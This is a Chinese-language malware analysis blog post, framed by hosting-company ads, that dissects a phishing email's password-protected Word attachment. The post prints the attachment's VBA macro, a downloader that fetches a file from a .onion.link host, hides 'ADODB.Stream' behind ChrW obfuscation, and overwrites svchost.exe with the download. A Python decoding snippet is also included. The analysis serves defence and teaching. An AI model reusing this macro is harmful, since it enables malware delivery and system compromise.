上周一（12月4號），朋友給我轉(zhuǎn)發(fā)了一封垃圾郵件，郵件里面附帶一個word文檔，我們倆都是搞信安，自然察覺一絲危險的氣味，之前也沒有分析過word附件，因而有了今天的分析。

讓客戶滿意是我們工作的目標，不斷超越客戶的期望值來自于我們對這個行業(yè)的熱愛。我們立志把好的技術(shù)通過有效、簡單的方式提供給客戶，將通過不懈努力成為客戶在信息化領(lǐng)域值得信任、有價值的長期合作伙伴，公司提供的服務(wù)項目有：國際域名空間、網(wǎng)絡(luò)空間、營銷軟件、網(wǎng)站建設(shè)、上杭網(wǎng)站維護、網(wǎng)站推廣。

• 環(huán)境:ubuntu 16.04
• office軟件: LibreOffice writer

1. FBI Warning

分析有風險，請在虛擬機上運行；且在分析之前要禁止word的宏自動運行

2. 郵件截圖

3. 郵件分析

可以看到郵件的正文內(nèi)容，是由一張圖片和一個附件組成，其中我們要重點關(guān)注的就是。

• doc附件有密碼，且密碼為1115

4. 附件分析

一般分析方法

• 4.1 一般來說，非打開方式去分析一個word附件，我們一般會選擇oletools，但是這是在word文檔非加密的情況下，加了密碼后無法通過oletools來提取word文檔中的宏。

• 4.2 olevba 提取宏展示

  olevba -c xxx.doc

  • -c: 只顯示word中的宏代碼
  • -a: 自動分析word是否可疑
    

加了密碼后，就不能用一般的分析方法

• 4.3 嘗試是用olevba來提取文檔的vba代碼
  
• 4.4 關(guān)閉宏自動運行的前提下，打開word附件。
  • 4.4.1 可以看到，word文檔需要密碼，當你輸入完密碼后，就會自動打開文檔，如果你之前啟用了宏，那么當你輸入完密碼后就會中招。
    
  • 4.4.2 打開后，提示word文檔包含宏
    
  • 4.4.3 誘惑用戶啟用宏
    

• 4.5 查看宏代碼
  可以看到這里存在一段vb編寫的代碼，從調(diào)用WinHttpReq可以猜出來，這一個word文檔的作用是一個下載器
  

• 4.6 宏代碼分析
• Step1. 訪問暗網(wǎng)的某個網(wǎng)站下載一個文件,現(xiàn)在已經(jīng)無法打開這個暗網(wǎng)的鏈接。

Sub Main
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

WinHttpReq.Open "GET", "http://ypg7rfjvfywj7jhp.onion.link/icon.jpg", False, "username", "password"
WinHttpReq.send

如下圖，使用tor瀏覽器訪問對應(yīng)的暗網(wǎng)鏈接，返回一個網(wǎng)頁來說明該暗網(wǎng)地址已經(jīng)失效。

• Step2. 一個簡單的混淆，拼湊出

  Dim first5 As String
  Dim second5 As String
  Dim last5 As String
  first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
  second5 = ChrW(97) & ChrW(109)
  last5 = first5 + second5

  其中重要的部分就是first5和second5中的ChrW,ChrW是將十進制的ascii值轉(zhuǎn)換為ascii字符，因而可以用python來做一個轉(zhuǎn)換。

first5 = "ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)"
second5 = "ChrW(97) & ChrW(109)"
def convert_vb2py(s):
    first_s = s.replace("ChrW","chr")
    second_s = first_s.replace("&","+")
    return second_s
print eval(convert_vb2py(first5))+eval(convert_vb2py(second5))

最終我們可以得到last5的值為ADODB.Stream，它是vb中一個對象，用來與文件系統(tǒng)操作

• Step 3. 保存http://ypg7rfjvfywj7jhp.onion.link/icon.jpg 到本地文件

  xyuhjnx = WinHttpReq.responseBody
  If WinHttpReq.Status = 200 Then
  Set oStream = CreateObject(last5)
  oStream.Open
  oStream.Type = Val("1FFF")
  oStream.Write WinHttpReq.responseBody
  Dim first6 As String
  Dim last6 As String
  first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
  last6 = first6
  oStream.SaveToFile Environ( "svchost.exe", Val("2FFF")
  oStream.Close
  End If
  End Sub

  代碼獲取icon.jpg的內(nèi)容，并創(chuàng)建一個Stream對象寫入icon.jpg的內(nèi)容，然后保存到svchost.exe所在的目錄，也就是c:\windows\system32\目錄下，Val("2FFF")的值為2，在adobe.stream的SaveToFile方法中，第二個參數(shù)代表覆蓋原來的文件。

• 4.7 到此，我們分析完整個宏代碼
  總的來說，這是一個downloader，下載惡意代碼并替換系統(tǒng)的svchost.exe。國外的一些安全研究者也上傳了去掉密碼后的文檔到惡意軟件分析網(wǎng)站，下面是其中的一個鏈接。

參考鏈接

• 其它事件分析1
• 惡意軟件分析網(wǎng)站分析結(jié)果
• SaveToFIle參考

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務(wù)器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國服務(wù)器、虛擬主機、免備案服務(wù)器”等云主機租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務(wù)可用性高、性價比高”等特點與優(yōu)勢，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應(yīng)用場景需求。